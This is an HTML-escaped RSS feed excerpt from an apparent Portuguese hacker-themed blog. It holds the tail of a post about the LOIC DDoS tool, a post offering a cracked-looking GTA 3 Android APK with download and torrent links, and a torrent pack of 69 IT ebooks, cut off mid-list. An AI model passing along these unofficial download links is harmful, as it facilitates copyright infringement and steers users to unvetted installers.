Fonte:&amp;nbsp;&lt;span style=&quot;border: 0px; color: #333333; font-family: tohama, Verdana, Arial, sans-serif; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;a href=&quot;http://remote-execution.blogspot.com.br/2011/04/instalacao-e-uso-do-loic-no-linux.html&quot;&gt;&lt;span style=&quot;color: #3d5175;&quot;&gt;&lt;span style=&quot;font-style: inherit;&quot;&gt;B&lt;/span&gt;&lt;/span&gt;log Do Bhior&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
</description><link>http://max-sec.blogspot.com/2013/10/loic-ferramente-ultilizada-pelos.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJxBMkD1SkD1szmR3VN-KDz5GuiPJtCl2rTDjCZUBLGwep3gN2h7y90sl-W9FsDoR8A_WVPw6jVVmlUVxLhjbmod7chC3mVLbjusqRErdFias1GeuDgj98xpGQ7XZqiXEUXBFtiDweqKg/s72-c/anonymous.jpeg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-1420507730956886972</guid><pubDate>Thu, 17 Oct 2013 05:58:00 +0000</pubDate><atom:updated>2013-10-16T22:58:38.616-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><title>GTA 3 - para Android</title><description>&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: white; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;&quot;&gt;GTA 3 - Grand Theft Auto III apk + data&lt;/span&gt;&lt;/h2&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/nmHeZ9BBo8dHmDnpcWBz1AbNGvhM_kYKPG6RdYkxpSnnZL4O0mbzHbA0HrB9J4HiMAI=w705&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;312&quot; src=&quot;http://2.bp.blogspot.com/nmHeZ9BBo8dHmDnpcWBz1AbNGvhM_kYKPG6RdYkxpSnnZL4O0mbzHbA0HrB9J4HiMAI=w705&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;b style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 20px; text-align: left;&quot;&gt;Descrição:&lt;/b&gt;&lt;/h2&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;text-align: justify;&quot;&gt;Grand Theft Auto 3 leva para o seu dispositivo um clássico dos games: o GTA de sempre, só que agora dentro do seu Android.&lt;/span&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;A Rockstar Games, para comemorar seus 10 anos de vida, acaba de lançar o Grand Theft Auto 3 para Android. Você vai viver toda a ação e adrenalina que rolam em Liberty City: uma cidade sombria onde você guia o criminoso Claude, cujo objetivo é se transformar em uma lenda.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;text-align: justify;&quot;&gt;Os gráficos em 3D do Grand Theft Auto 3 para Android são espetaculares e muitas cenas do game estão cheias de humor negro. A trilha sonora também é muito bem cuidada, com destaque especial para efeitos e vozes dos personagens.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;O que há nessa versão:&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;(v1.1.4)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;div&gt;
✓Diversas correções de bugs&lt;/div&gt;
&lt;br /&gt;&lt;span style=&quot;font-family: inherit; text-align: justify;&quot;&gt;Saiba mais no&amp;nbsp;&lt;b&gt;Google Play.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/-CJOr-GLd0gk/UXN3zAgSHYI/AAAAAAAALN8/MA1OcpCFluo/s400/gta-3-para-android1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;266&quot; src=&quot;http://2.bp.blogspot.com/-CJOr-GLd0gk/UXN3zAgSHYI/AAAAAAAALN8/MA1OcpCFluo/s400/gta-3-para-android1.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/-Abh8F35mn5w/UXN3zCC47hI/AAAAAAAALOE/xEt7vWV2Z1Q/s400/gta-3-para-android2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;266&quot; src=&quot;http://1.bp.blogspot.com/-Abh8F35mn5w/UXN3zCC47hI/AAAAAAAALOE/xEt7vWV2Z1Q/s400/gta-3-para-android2.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://3.bp.blogspot.com/-egxgpYfwPkg/UXN3zYfXMtI/AAAAAAAALOI/6VtsUr8B2cI/s400/gta-3-para-android3.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;266&quot; src=&quot;http://3.bp.blogspot.com/-egxgpYfwPkg/UXN3zYfXMtI/AAAAAAAALOI/6VtsUr8B2cI/s400/gta-3-para-android3.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&lt;b&gt;Tamanho:&amp;nbsp;&lt;/b&gt;587 MB&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&amp;nbsp;Apk e Data&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 20px; text-align: center;&quot;&gt;
&lt;b&gt;Requer:&amp;nbsp;&lt;/b&gt;Android 2.2 ou mais&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span id=&quot;6225884293254457275&quot;&gt;

&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px; text-align: center;&quot;&gt;
&lt;b&gt;Adquira esse Aplicativo no -&amp;nbsp;&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.rockstar.gta3&quot; target=&quot;_blank&quot;&gt;Google Play&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Instalação:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/b&gt;
&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;1- &lt;/b&gt;Extraia a data para &lt;u&gt;Sdcard/Android/Obb&lt;/u&gt;&lt;/div&gt;
&lt;/b&gt;
&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;2-&lt;/b&gt; Instale o Apk&lt;/div&gt;
&lt;/b&gt;
&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;3-&lt;/b&gt; Abra o jogo, quando aparecer uma mensagem clique em &#39;Acepted&#39;&lt;/div&gt;
&lt;/b&gt;
&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;4-&lt;/b&gt; Divirta-se xD&lt;/div&gt;
&lt;/b&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;a href=&quot;http://pastebin.com/MwkCBbXG&quot;&gt;Download&lt;/a&gt; GTA 3 v1.4 Apk e Data&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/b&gt;
&lt;b&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/b&gt;&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;a href=&quot;http://www.mirrorcreator.com/files/XS8IJYTS/GTA-3-v1.4-byJogosAndroidGratis.apk_links&quot;&gt;Download&lt;/a&gt; GTA 3 v1.4 Apk&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/b&gt;
&lt;b&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/b&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;a href=&quot;https://dl.dropboxusercontent.com/u/64132059/GTA-3-v1.1.4-Full-Torrent-reupbyJogosAndroidGratis.torrent&quot;&gt;Download por Torrent&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;GTA 3 v1.4 Data&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #444444; font-family: Helvetica, Arial, sans-serif; font-size: 13px; line-height: 20px; text-align: justify;&quot;&gt;
&lt;span style=&quot;border: none; font-family: Arial, Helvetica, sans-serif; list-style: none; margin: 0px; outline: none; padding: 0px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
</description><link>http://max-sec.blogspot.com/2013/10/gta-3-para-android.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/nmHeZ9BBo8dHmDnpcWBz1AbNGvhM_kYKPG6RdYkxpSnnZL4O0mbzHbA0HrB9J4HiMAI=s72-w705-c" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-3106809939744769359</guid><pubDate>Wed, 16 Oct 2013 21:53:00 +0000</pubDate><atom:updated>2013-10-16T14:55:47.116-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Diversos.</category><title> Pacotão de Ebooks de TI (69 Livros Completos)</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieed-dyvXewsygWZfCerSPKnAYlvcTNhviB9rJj28J1vhymSIsL9liDRY97ChpGcBE56y2repTrgEruTk_L9p-pjI8k_sM-re9MV8mzii_WyPbpOfHp4Lhyphenhyphenxou28Xx6rYUKBT8leNFDQU/s1600/697_tablet_01.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;232&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieed-dyvXewsygWZfCerSPKnAYlvcTNhviB9rJj28J1vhymSIsL9liDRY97ChpGcBE56y2repTrgEruTk_L9p-pjI8k_sM-re9MV8mzii_WyPbpOfHp4Lhyphenhyphenxou28Xx6rYUKBT8leNFDQU/s320/697_tablet_01.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;Salve Salve Galera!&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;Estou colocando um torrent com 69 livros completos de TI.&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;b style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;O que é?&lt;/b&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;Um pacotão de ebooks para&lt;span class=&quot;Apple-converted-space&quot;&gt; estudantes&lt;/span&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt; &lt;/span&gt;e profissionais de TI.&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;b style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;Qual o Formato?&lt;/b&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;O formato dos ebooks são em PDF, e tem uma excelente&lt;span class=&quot;Apple-converted-space&quot;&gt; qualidade&lt;/span&gt;. Para realizar o download, portanto, é feito via torrent.&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;b style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;Muito Pesado?&lt;/b&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;Sim! Se for realizar o download completo, terás 23 Gb de arquivos. Como não é utilizado arquivos compactados, é possível selecionar apenas os livros que tens interesse antes de iniciar o download.&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;b style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;O Que tem?&lt;/b&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;Os livros que tem no pacotão são:&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- A Arte de Gerenciamento de Projetos&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Administração do Linux&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;- Administração e Manutenção do Ambiente Windows&lt;span class=&quot;Apple-converted-space&quot;&gt; Server&lt;/span&gt;&lt;a href=&quot;http://forum.guiadohacker.com.br/showthread.php?t=31769#&quot; rel=&quot;nofollow&quot; style=&quot;border-bottom-style: dotted; border-bottom-width: 1px; color: #14ff37; text-decoration: underline;&quot;&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt; &lt;/span&gt;2003&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;- Ajax Ricj internet Applications - Desenvolvimento Web para Programadores&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Análise de Circuitos Elétricos&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Aplicações Móveis&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Aprenda J2EE em 21 Dias&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Aprenda Orientação Orientada a Objetos em 21 Dias&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Aprendendo Python (2ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Arquitetura e Organização de Computadores&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- BioFísica&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- C e XML&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- C# - Como Programar&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Circuitos Elétricos (8ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;- Code Complete (2ª Edição)&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; 